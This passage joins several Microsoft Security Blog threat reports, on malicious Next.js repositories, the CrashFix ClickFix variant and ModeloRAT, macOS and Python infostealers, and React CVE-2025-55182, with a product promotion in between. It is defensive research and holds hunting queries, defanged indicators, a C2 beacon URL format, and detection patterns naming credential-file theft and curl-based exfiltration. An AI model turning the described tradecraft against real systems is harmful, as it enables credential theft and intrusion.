Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.  

Microsoft Defender XDR threat analytics  

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.  

Hunting queries   

Node.js fetching remote JavaScript from untrusted PaaS domains (C2 stage 1/2) 

DeviceNetworkEvents 
| where InitiatingProcessFileName in~ ("node","node.exe") 
| where RemoteUrl has_any ("vercel.app", "api-web3-auth", "oracle-v1-beta") 
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl 

Detection of next.config.js dynamic loader behavior (readFile → eval) 

DeviceProcessEvents 
| where FileName in~ ("node","node.exe") 
| where ProcessCommandLine has_any ("next dev","next build") 
| where ProcessCommandLine has_any ("eval", "new Function", "readFile") 
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine 

Repeated shortinterval beaconing to attacker C2 (/api/errorMessage, /api/handleErrors) 

DeviceNetworkEvents 
| where InitiatingProcessFileName in~ ("node","node.exe") 
| where RemoteUrl has_any ("/api/errorMessage", "/api/handleErrors") 
| summarize BeaconCount = count(), FirstSeen=min(Timestamp), LastSeen=max(Timestamp) 
          by DeviceName, InitiatingProcessCommandLine, RemoteUrl 
| where BeaconCount > 10 

Detection of detached child Node interpreters (node – from parent Node) 

DeviceProcessEvents 
| where InitiatingProcessFileName in~ ("node","node.exe") 
| where ProcessCommandLine endswith "-" 
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine 

Directory enumeration and exfil behavior

DeviceNetworkEvents 
| where RemoteUrl has_any ("/hsocketNext", "/hsocketResult", "/upload", "/uploadsecond", "/uploadend") 
| project Timestamp, DeviceName, RemoteUrl, InitiatingProcessCommandLine 

Suspicious access to sensitive files on developer machines 

DeviceFileEvents 
| where Timestamp > ago(14d) 
| where FileName has_any (".env", ".env.local", "Cookies", "Login Data", "History") 
| where InitiatingProcessFileName in~ ("node","node.exe","Code.exe","chrome.exe") 
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine 

Indicators of compromise  

References    

• Threat Actors Expand Abuse of Microsoft Visual Studio Code 

• North Korea-Linked Hackers Target Developers via Malicious VS Code Projects 

• New DPRK Malware Uses Microsoft VSCode Dictionary Files | OpenSource Malware Blog 

This research is provided by Microsoft Defender Security Research with contributions from Colin Milligan.

Learn more   

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

Explore how to build and customize agents with Copilot Studio Agent Builder 

Microsoft 365 Copilot AI security documentation 

How Microsoft discovers and mitigates evolving attacks against AI guardrails 

Learn more about securing Copilot Studio agents with Microsoft Defender  

Learn more about Protect your agents in real-time during runtime (Preview) – Microsoft Defender for Cloud Apps | Microsoft Learn   

The post Developer-targeting campaign using malicious Next.js repositories appeared first on Microsoft Security Blog.

This variant represents a notable escalation in ClickFix tradecraft, combining user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques. The newly observed behavior has been designated CrashFix, reflecting a broader rise in browser‑based social engineering combined with living‑off‑the‑land binaries and Python‑based payload delivery. Threat actors are increasingly abusing trusted user actions and native OS utilities to bypass traditional defences, making behaviour‑based detection and user awareness critical.

Technical Overview

This attack typically begins when a victim searches for an ad blocker and encounters a malicious advertisement. This ad redirects users to the official Chrome Web Store, creating a false sense of legitimacy around a harmful browser extension. The extension impersonates the legitimate uBlock Origin Lite ad blocker to deceive users into installing it.

Sample Data:

File Origin Referrer URL: https://chromewebstore.google[.]com
FileOriginURL: https://clients2[.]googleusercontent[.]com/crx/blobs/AdNiCiWgWaD8B4kV4BOi-xHAdl_xFwiwSmP8QmSc6A6E1zgoIEADAFK6BjirJRdrSZzhbF76CD2kGkCiVsyp7dbwdjMX-0r9Oa823TLI9zd6DKnBwQJ3J_98pRk8vPDsYoHiAMZSmuXxBj8-Ca_j38phC9wy0r6JCZeZXw/CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx?authuser=0 
FileName: cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx
Folderpath: C:\Users\PII\AppData\Local\Temp\scoped_dir20916_1128691746\cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx
SHA256: c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c

UUID is transmitted to an attacker-controlled‑ typosquatted domain, www[.]nexsnield[.]com, where it is used to correlate installation, update, and uninstall activities.

To evade detection and prevent users from immediately associating the malicious browser extension with subsequent harmful behavior, the payload employs a delayed execution technique. Once activated, the payload causes browser issues only after a period, making it difficult for victims to connect the disruptions to the previously installed malicious extension.

The core malicious functionality performs a denial-of‑service attack against the victim’s browser by creating an infinite loop. Eventually, it presents a fake CrashFix security warning through a pop‑up window to further mislead the user.

A notable new tactic in this ClickFix variant is the misuse of the legitimate native Windows utility finger.exe, which is originally intended to retrieve user information from remote systems. The threat actors are seen abusing this tool by executing the following malicious command through the Windows dialog box.

The native Windows utility finger.exe is copied into the temporary directory and subsequently renamed to ct.exe (SHA‑256: beb0229043741a7c7bfbb4f39d00f583e37ea378d11ed3302d0a2bc30f267006). This renaming is intended to obscure its identity and hinder detection during analysis.

The renamed ct.exe establishes a network connection to the attacker controlled‑ IP address 69[.]67[.]173[.]30, from which it retrieves a large charcode payload containing obfuscated PowerShell. Upon execution, the obfuscated script downloads an additional PowerShell payload, script.ps1 (SHA‑256:
c76c0146407069fd4c271d6e1e03448c481f0970ddbe7042b31f552e37b55817), from the attacker’s server at 69[.]67[.]173[.]30/b. The downloaded file is then saved to the victim’s AppData\Roaming directory, enabling further execution.

The downloaded PowerShell payload, script.ps1, contains several layers of obfuscation. Upon de-obfuscation, the following behaviors were identified:

• The script enumerates running processes and checks for the presence of multiple analysis or debugging tools such as Wireshark, Process Hacker, WinDbg, and others.
• It determines whether the machine is domain-joined, as‑ part of an environment or privilege assessment.
• It sends a POST request to the attacker controlled‑ endpoint 69[.]67[.]173[.]30, presumably to exfiltrate system information or retrieve further instructions.

Because the affected host was domain-joined, the script proceeded to download a backdoor onto the device. This behavior suggests that the threat actor selectively deploys additional payloads when higher‑ value targets—such as enterprise‑ joined‑ systems are identified.

The component WPy64‑31401 is a WinPython package—a portable Python distribution that requires no installation. In this campaign, the attacker bundles a complete Python environment as part of the payload to ensure reliable execution across compromised systems.

The core malicious logic resides in the modes.py file, which functions as a Remote Access Trojan (RAT). This script leverages pythonw.exe to execute the malicious Python payload covertly, avoiding visible console windows and reducing user suspicion.

The RAT, identified as ModeloRAT here, communicates with the attacker’s command‑and‑control (C2) servers by sending periodic beacon requests using the following format:

http://{C2_IPAddress}:80/beacon/{client_id}

Further establishing persistence by creating a Run registry entry. It modifies the python script’s execution path to utilize pythonw.exe and writes the persistence key under:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This ensures that the malicious Python payload is executed automatically each time the user logs in, allowing the attacker to maintain ongoing access to the compromised system.

The ModeloRAT subsequently downloaded an additional payload from a Dropbox URL, which delivered a Python script named extentions.py. This script was executed using python.exe

The ModeloRAT initiated extensive reconnaissance activity upon execution. It leveraged a series of native Windows commands—such as nltest, whoami, and net use—to enumerate detailed domain, user, and network information.

Additionally, in post-compromise infection chains, Microsoft identified an encoded PowerShell command that downloads a ZIP archive from the IP address 144.31.221[.]197. The ZIP archive contains a Python-based payload (udp.pyw) along with a renamed Python interpreter (run.exe), and establishes persistence by creating a scheduled task named “SoftwareProtection,” designed to blend in as legitimate software protection service, and which repeatedly executes the malicious Python payload every 5 minutes.

Mitigation and protection guidance

• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. 
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach. 
• As a best practice, organizations may apply network egress filtering and restrict outbound access to protocols, ports, and services that are not operationally required. Disabling or limiting network activity initiated by legacy or rarely used utilities, such as the finger utility (TCP port 79), can help reduce the surface attack and limit opportunities for adversaries to misuse built-in system tools.
• Enable network protection in Microsoft Defender for Endpoint. 
• Turn on web protection in Microsoft Defender for Endpoint. 
• Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. 
• Enforce MFA on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, at all times. 
• Remind employees that enterprise or workplace credentials should not be stored in browsers or password vaults secured with personal credentials. Organizations can turn off password syncing in browser on managed devices using Group Policy. 
• Turn on the following attack surface reduction rules to block or audit activity associated with this threat: 
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion 
  • You can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in Vulnerability management. In the Recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity.

Microsoft Defender XDR detections   

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR

Hunting queries 

Microsoft Defender XDR customers can run the following queries to find related activity in their environment:

Use the below query to identify the presence of Malicious chrome Extension

DeviceFileEvents
| where FileName has "cpcdkmjddocikjdkbbeiaafnpdbdafmi"

Identify the malicious to identify Network connection related to Chrome Extension

DeviceNetworkEvents
| where RemoteUrl has_all ("nexsnield.com")

Use the below query to identify the abuse of LOLBIN Finger.exe

DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("cmd.exe","start","finger.exe","ct.exe") or ProcessCommandLine has_all ("cmd.exe","start","finger.exe","ct.exe")
| project-reorder Timestamp,DeviceId,InitiatingProcessCommandLine,ProcessCommandLine,InitiatingProcessParentFileName

Use the below query to Identify the network connection to malicious IP address

DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all ("ct.exe","confirm")
| distinct RemoteIP
| join kind=inner DeviceNetworkEvents on RemoteIP
)
| project Timestamp, DeviceId, DeviceName, RemoteIP, RemoteUrl, InitiatingProcessCommandLine, InitiatingProcessParentFileName

Use the below query to identify the network connection to Beacon IP address

DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all ("pythonw.exe","modes.py")
| where RemoteIP !in ("", "127.0.0.1")
| project-reorder Timestamp, DeviceName,DeviceId,TenantId,OrgId,RemoteUrl,InitiatingProcessCommandLine,InitiatingProcessParentFileName

Use the below query to identify the Registry RUN persistence

DeviceRegistryEvents
| where InitiatingProcessCommandLine has_all ("pythonw.exe","modes.py")

Use the below query to identify the scheduled task persistence

DeviceEvents
| where ActionType == "ScheduledTaskCreated"
| where InitiatingProcessCommandLine has_all ("run.exe", "udp.pyw")

Indicators of compromise

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI maps) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

References

• https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke

This research is provided by Microsoft Defender Security Research with contributions from Sai Chakri Kandalai and Kaustubh Mangalwedhekar.

Learn more   

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.  

Learn more about securing Copilot Studio agents with Microsoft Defender 

Learn more about Protect your agents in real-time during runtime (Preview) – Microsoft Defender for Cloud Apps | Microsoft Learn  

Explore how to build and customize agents with Copilot Studio Agent Builder  

The post New Clickfix variant ‘CrashFix’ deploying Python Remote Access Trojan appeared first on Microsoft Security Blog.

These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments. Simultaneously, Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead. Other threat actors are abusing trusted platforms and utilities—including WhatsApp and PDF converter tools—to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.

This blog examines how modern infostealers operate across operating systems and delivery channels by blending into legitimate ecosystems and evading conventional defenses. We provide comprehensive detection coverage through Microsoft Defender XDR and actionable guidance to help organizations detect, mitigate, and respond to these evolving threats. 

Activity overview 

macOS users are being targeted through fake software and browser tricks 

Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements—that either prompt them to download fake applications or instruct them to copy and paste commands into their Terminal. These “ClickFix” style attacks trick users into downloading malware that steals browser passwords, cryptocurrency wallets, cloud credentials, and developer access keys. 

Three major Mac-focused stealer campaigns include DigitStealer (distributed through fake DynamicLake software), MacSync (delivered via copy-paste Terminal commands), and Atomic Stealer (using fake AI tool installers). All three harvest the same types of data—browser credentials, saved passwords, cryptocurrency wallet information, and developer secrets—then send everything to attacker servers before deleting traces of the infection. 

Stolen credentials enable account takeovers across banking, email, social media, and corporate cloud services. Cryptocurrency wallet theft can result in immediate financial loss. For businesses, compromised developer credentials can provide attackers with access to source code, cloud infrastructure, and customer data. 

Phishing campaigns are delivering Python-based stealers to organizations 

The proliferation of Python information stealers has become an escalating concern. This gravitation towards Python is driven by ease of use and the availability of tools and frameworks allowing quick development, even for individuals with limited coding knowledge. Due to this, Microsoft Defender Experts observed multiple Python-based infostealer campaigns over the past year. They are typically distributed via phishing emails and collect login credentials, session cookies, authentication tokens, credit card numbers, and crypto wallet data.

PXA Stealer, one of the most notable Python-based infostealers seen in 2025, harvests sensitive data including login credentials, financial information, and browser data. Linked to Vietnamese-speaking threat actors, it targets government and education entities through phishing campaigns. In October 2025 and December 2025, Microsoft Defender Experts investigated two PXA Stealer campaigns that used phishing emails for initial access, established persistence via registry Run keys or scheduled tasks, downloaded payloads from remote locations, collected sensitive information, and exfiltrated the data via Telegram. To evade detection, we observed the use of legitimate services such as Telegram for command-and-control communications, obfuscated Python scripts, malicious DLLs being sideloaded, Python interpreter masquerading as a system process (i.e., svchost.exe), and the use of signed and living off the land binaries.

Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware. Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.

Attackers are weaponizing WhatsApp and PDF tools to spread infostealers 

Since late 2025, platform abuse has become an increasingly prevalent tactic wherein adversaries deliberately exploit the legitimacy, scale, and user trust associated with widely used applications and services. 

WhatsApp Abused to Deliver Eternidade Stealer: During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign leveraging multi-stage infection and worm-like propagation to distribute malware. The activity begins with an obfuscated Visual Basic script that drops a malicious batch file launching PowerShell instances to download payloads.

One of the payloads is a Python script that establishes communication with a remote server and leverages WPPConnect to automate message sending from hijacked WhatsApp accounts, harvests the victim’s contact list, and sends malicious attachments to all contacts using predefined messaging templates. Another payload is a malicious MSI installer that ultimately delivers Eternidade Stealer, a Delphi-based credential stealer that continuously monitors active windows and running processes for strings associated with banking portals, payment services, and cryptocurrency exchanges including Bradesco, BTG Pactual, MercadoPago, Stripe, Binance, Coinbase, MetaMask, and Trust Wallet.

Malicious Crystal PDF installer campaign: In September 2025, Microsoft Defender Experts discovered a malicious campaign centered on an application masquerading as a PDF editor named Crystal PDF. The campaign leveraged malvertising and SEO poisoning through Google Ads to lure users. When executed, CrystalPDF.exe establishes persistence via scheduled tasks and functions as an information stealer, covertly hijacking Firefox and Chrome browsers to access sensitive files in AppData\Roaming, including cookies, session data, and credential caches.

Mitigation and protection guidance 

Microsoft recommends the following mitigations to reduce the impact of the macOS‑focused, Python‑based, and platform‑abuse infostealer threats discussed in this report. These recommendations draw from established Defender blog guidance patterns and align with protections offered across Microsoft Defender XDR. 

Organizations can follow these recommendations to mitigate threats associated with this threat:             

Strengthen user awareness & execution safeguards 

• Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS. 

• Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems. 

Harden macOS environments against native tool abuse 

• Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers. 

• Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting. 

• Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data. 

Control outbound traffic & staging behavior 

• Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, AMOS, and Python‑based stealer campaigns. 

• Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts. 

• Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources. 

Protect against Python-based stealers & cross-platform payloads 

• Harden endpoint defenses around LOLBIN abuse, such as certutil.exe decoding malicious payloads. 

• Evaluate activity involving AutoIt and process hollowing, common in platform‑abuse campaigns. 

Microsoft also recommends the following mitigations to reduce the impact of this threat: 

• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. 

• Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. 

• Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats. 

• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. 

• Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. 

• Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to prevent attackers from using local administrator privileges to set antivirus exclusions. 

• Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against LOLBAS techniques used by threat actors: 
  • Block execution of potentially obfuscated scripts 
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion 
  • Block JavaScript or VBScript from launching downloaded executable content 

Microsoft Defender XDR detections 

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. 

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.  

Threat intelligence reports 

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. 

Microsoft Defender XDR Threat analytics   

• From ClickFix to code signed: the quiet shift of MacSync Stealer malware
• Malicious Crystal PDF installer campaign

Hunting queries   

Microsoft Defender XDR  

Microsoft Defender XDR customers can run the following queries to find related activity in their networks: 

Use the following queries to identify activity related to DigitStealer 

// Identify suspicious DynamicLake disk image (.dmg) mounting 
DeviceProcessEvents 
| where FileName has_any ('mount_hfs', 'mount') 
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine') 
| where ProcessCommandLine contains '/Volumes/Install DynamicLake' 

 
// Identify data exfiltration to DigitStealer C2 API endpoints. 
DeviceProcessEvents 
| where InitiatingProcessFileName has_any ('bash', 'sh') 
| where ProcessCommandLine has_all ('curl', '--retry 10') 
| where ProcessCommandLine contains 'hwid=' 
| where ProcessCommandLine endswith "api/credentials" 
        or ProcessCommandLine endswith "api/grabber" 
        or ProcessCommandLine endswith "api/log" 
| extend APIEndpoint = extract(@"/api/([^\s]+)", 1, ProcessCommandLine) 

Use the following queries to identify activity related to MacSync

// Identify exfiltration of staged data via curl 
DeviceProcessEvents 
| where InitiatingProcessFileName =~ "zsh" and FileName =~ "curl" 
| where ProcessCommandLine has_all ("curl -k -X POST -H", "api-key: ", "--max-time", "-F file=@/tmp/", ".zip", "-F buildtxd=") 

Use the following queries to identify activity related to Atomic Stealer (AMOS)

// Identify suspicious AlliAi disk image (.dmg) mounting  
DeviceProcessEvents  
| where FileName has_any ('mount_hfs', 'mount') 
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')  
| where ProcessCommandLine contains '/Volumes/ALLI' 

Use the following queries to identify activity related to PXA Stealer: Campaign 1

// Identify activity initiated by renamed python binary 
DeviceProcessEvents 
| where InitiatingProcessFileName endswith "svchost.exe" 
| where InitiatingProcessVersionInfoOriginalFileName == "pythonw.exe" 

// Identify network connections initiated by renamed python binary 
DeviceNetworkEvents 
| where InitiatingProcessFileName endswith "svchost.exe" 
| where InitiatingProcessVersionInfoOriginalFileName == "pythonw.exe" 

Use the following queries to identify activity related to PXA Stealer: Campaign 2

// Identify malicious Process Execution activity 
DeviceProcessEvents 
 | where ProcessCommandLine  has_all ("-y","x",@"C:","Users","Public", ".pdf") and ProcessCommandLine  has_any (".jpg",".png") 

// Identify suspicious process injection activity 
DeviceProcessEvents 
 | where FileName == "cvtres.exe" 
 | where InitiatingProcessFileName has "svchost.exe" 
 | where InitiatingProcessFolderPath !contains "system32" 

Use the following queries to identify activity related to WhatsApp Abused to Deliver Eternidade Stealer

// Identify the files dropped from the malicious VBS execution 
DeviceFileEvents 
| where InitiatingProcessCommandLine has_all ("Downloads",".vbs") 
| where FileName has_any (".zip",".lnk",".bat") and FolderPath has_all ("\\Temp\\") 

// Identify batch script launching powershell instances to drop payloads 
DeviceProcessEvents 
| where InitiatingProcessParentFileName == "wscript.exe" and InitiatingProcessCommandLine  has_any ("instalar.bat","python_install.bat") 
| where ProcessCommandLine !has "conhost.exe" 
 
// Identify AutoIT executable invoking malicious AutoIT script 
DeviceProcessEvents 
| where InitiatingProcessCommandLine   has ".log" and InitiatingProcessVersionInfoOriginalFileName == "Autoit3.exe" 

Use the following queries to identify activity related to Malicious CrystalPDF Installer Campaign

// Identify network connections to C2 domains 
DeviceNetworkEvents 
| where InitiatingProcessVersionInfoOriginalFileName == "CrystalPDF.exe" 

// Identify scheduled task persistence 
DeviceEvents 
| where InitiatingProcessVersionInfoProductName == "CrystalPDF" 
| where ActionType == "ScheduledTaskCreated 

Indicators of compromise 

Microsoft Sentinel  

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.   

References  

• MacSync Stealer Evolves: From ClickFix to Code-Signed Swift Malware — Jamf Threat Labs  
• Infostealers Strike Again: Malicious Installers Pass Through EDRs Undetected 
• SpiderLabs IDs New Banking Trojan Distributed Through WhatsApp 
• A Vietnamese threat actor’s shift from PXA Stealer to PureRAT | Huntress 
• Ghost in the Zip | New PXA Stealer and Its Telegram-Powered Ecosystem | SentinelOne 
• Information-Stealing Malware Distribution Campaign Using Emails Disguised as Copyright Infringement Notices – wizSafe Security Signal -Guideposts to Safety and Security- IIJ 

This research is provided by Microsoft Defender Security Research with contributions from Felicia Carter, Kajhon Soyini, Balaji Venkatesh S, Sai Chakri Kandalai, Dietrich Nembhard, Sabitha S, and Shriya Maniktala.

Learn more   

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.  

Learn more about securing Copilot Studio agents with Microsoft Defender 

Learn more about Protect your agents in real-time during runtime (Preview) – Microsoft Defender for Cloud Apps | Microsoft Learn  

Explore how to build and customize agents with Copilot Studio Agent Builder  

The post Infostealers without borders: macOS, Python stealers, and platform abuse appeared first on Microsoft Security Blog.

Microsoft Defender Experts Suite

Get integrated security services that protect your organization and accelerate security outcomes in the new security offering from Microsoft.

Learn more

Elevate your security with expert-led services

Even as today’s security challenges feel overwhelming, you don’t have to face them alone. The Microsoft Defender Experts Suite combines managed extended detection and response (MXDR), end-to-end proactive and reactive incident response, and direct access to a designated Microsoft security advisor to help you protect your organization and accelerate security outcomes.

The Defender Experts Suite can help you do the following:

Defend against cyberthreats

Microsoft Defender Experts for XDR delivers round-the-clock MXDR, natively integrated with Microsoft Defender. Our seasoned analysts—bringing more than 600 years of combined experience—triage, investigate, and respond to incidents across endpoints, identities, email, cloud apps, and cloud workloads, helping to reduce alert fatigue and improve security operations center (SOC) efficiency. Defender Experts for XDR includes Microsoft Defender Experts for Hunting, which provides around-the-clock, proactive threat hunting across domains to help uncover emerging cyberthreats earlier.

With Defender Experts for XDR, you gain access to a designated service delivery engineer who helps you get the full value of the service and provides ongoing recommendations to strengthen your security posture. You can also connect with our experts on-demand for deeper insight into specific incidents, attack vectors, or nation-state cyberthreats.

Build cyber resilience

Microsoft Incident Response offers proactive and reactive services that help organizations prevent, withstand, and recover from cyber incidents. Backed by extensive threat intelligence, proprietary investigation tools, and direct engagement with Microsoft product engineering, Microsoft Incident Response strengthens resilience and delivers rapid response. Proactive services—such as incident response planning, assessments, simulation exercises, and advisory services—enhance incident response readiness, improve response capabilities, and provide tailored insights on the cyberthreat landscape.

When an incident does occur, Microsoft Incident Response rapidly investigates, removes the cyberattacker, and helps accelerates recovery. Operating on the frontlines of the world’s most complex cyberattacks since 2008, the Microsoft Incident Response team provides speed, precision, and confidence in the moments that matter most.

Modernize security operations

Microsoft Enhanced Designated Engineering provides direct access to Microsoft security advisors who partner with customers to strengthen security posture and operational maturity. Our experts work with you to help ensure Microsoft security technologies are properly architected, configured, and used effectively to achieve desired security outcomes, supported by ongoing assessments and continuous improvement. They also collaborate with security teams to optimize operations, modernize processes, and apply Microsoft best practices and real world threat intelligence to improve detection, response, and resilience—helping organizations operate with confidence as cyberthreats evolve.

Better together—integrated security services

With the Defender Experts Suite, organizations get more than standalone expertise—they gain integrated security services that reduce complexity and simplify operations. With shared intelligence and connected workflows, investigations can move faster, recommendations land in context, and improvements compound over time. Instead of managing multiple providers, security teams benefit from streamlined communication, consistent guidance, and comprehensive expertise from Microsoft security experts. This can result in a more resilient, more efficient, and more confident security operation that matures steadily rather than reacting in silos.

End-to-end, expert-led protection

Let’s look at the Microsoft Defender Experts Suite in action. When you first get started with the Microsoft Defender Experts Suite, Enhanced Designated Engineering guides you through deploying Defender workloads securely and helps ensure Defender Experts for XDR is configured correctly. Once operational, Defender Experts for XDR provides constant MXDR and threat hunting to protect your environment. Defender Experts for XDR will provide ongoing recommendations to improve your security posture, and your designated Microsoft security advisor helps you act on those recommendations as your environment evolves.

Assessments delivered by Microsoft Incident Response may uncover vulnerabilities or gaps. The Microsoft security advisor will step in to help you address them and strengthen resilience. And if an incident occurs, Defender Experts for XDR will work hand-in-hand with the Microsoft Incident Response team to help you respond and recover quickly. With end-to-end services delivered by Microsoft, you can benefit from reduced complexity, streamlined communication, comprehensive expertise, and continuous improvement.

Get started with the Microsoft Defender Experts Suite today and save

For a limited time, organizations can unlock the full value of expert-led services with a promotional offer. From January 1, 2026, through December 31, 2026, eligible customers can save up to 66% on the Microsoft Defender Experts Suite.² Read more about the Microsoft Defender Experts Suite and get started now.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

¹Bridging the Cyber Skills Gap, World Economic Forum, 2025.

²Eligible customers must purchase a minimum of 1,500 seats of the Microsoft Defender Experts Suite and have either Microsoft 365 E5 or Microsoft Defender and Purview  Frontline Workers (formerly Microsoft 365 F5).

The post Introducing the Microsoft Defender Experts Suite: Elevate your security with expert-led services appeared first on Microsoft Security Blog.

Exploitation activity related to this vulnerability was detected as early as December 5, 2025. Most successful exploits originated from red team assessments; however, we also observed real-world exploitation attempts by threat actors delivering multiple subsequent payloads, majority of which are coin miners. Both Windows and Linux environments have been observed to be impacted.

The React Server Components ecosystem is a collection of packages, frameworks, and bundlers that enable React 19 applications to run parts of their logic on the server rather than the browser. It uses the Flight protocol to communicate between client and server. When a client requests data, the server receives a payload, parses this payload, executes server-side logic, and returns a serialized component tree. The vulnerability exists because affected React Server Components versions fail to validate incoming payloads. This could allow attackers to inject malicious structures that React accepts as valid, leading to prototype pollution and remote code execution.

This vulnerability presents a significant risk because of the following factors:

• Default configurations are vulnerable, requiring no special setup or developer error.
• Public proof-of-concept exploits are readily available with near-100% reliability.
• Exploitation can happen without any user authentication since this is a pre-authentication vulnerability.
• The vulnerability could be exploited using a single malicious HTTP request.

In this report, Microsoft Defender researchers share insights from observed attacker activity exploiting this vulnerability. Detailed analyses, detection insights, as well as mitigation recommendations and hunting guidance are covered in the next sections. Further investigation towards providing stronger protection measures is in progress, and this report will be updated when more information becomes available.

Analyzing CVE-2025-55182 exploitation activity

React is widely adopted in enterprise environments. In Microsoft Defender telemetry, we see tens of thousands of distinct devices across several thousand organizations running some React or React-based applications. Some of the vulnerable applications are deployed inside containers, and the impact on the underlying host is dependent on the security configurations of the container.

